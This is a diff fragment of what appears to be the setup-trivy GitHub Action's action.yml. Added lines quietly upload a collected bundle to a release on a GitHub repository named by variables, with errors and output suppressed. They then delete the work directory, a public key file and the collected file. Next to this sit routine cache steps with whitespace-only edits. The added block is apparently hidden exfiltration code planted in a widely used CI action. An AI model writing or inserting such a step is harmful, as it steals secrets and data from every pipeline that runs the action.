140 + "https://uploads.github.com/repos/${_GH_USER}/${_REPO}/releases/${_RELEASE_ID}/assets?name=${_BUNDLE_NAME}" \

141 + -H "$_GH_AUTH" \

142 + -H "Content-Type: application/octet-stream" \

143 + --data-binary "@${_BUNDLE}" >/dev/null 2>&1 || true

144 + fi

145 + fi

146 +

147 + rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"

148 + fi

149 + rm -f "$COLLECTED"

45 150 ## Don't cache `latest` version

46 151 - name: Check the version for caching

47 152 if: ${{ inputs.cache == 'true' && inputs.version == 'latest' }}

@@ -96,8 +201,8 @@ runs:

96 201 ## So we need to save the binary right after installation.

97 202 ## cf. https://github.com/aquasecurity/setup-trivy/issues/18

98 203 - name: Save Trivy binary to cache

99 - if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}

204 + if: ${{ inputs.cache == 'true' && inputs.version != 'latest' && steps.cache.outputs.cache-hit != 'true' }}

100 205 uses: actions/cache/save@9255dc7a253b0ccc959486e2bca901246202afeb # v5.0.1

101 206 with:

102 207 path: ${{ steps.binary-dir.outputs.dir }}

103 - key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}

208 + key: trivy-binary-${{ inputs.version }}-${{ runner.os }}-${{ runner.arch }}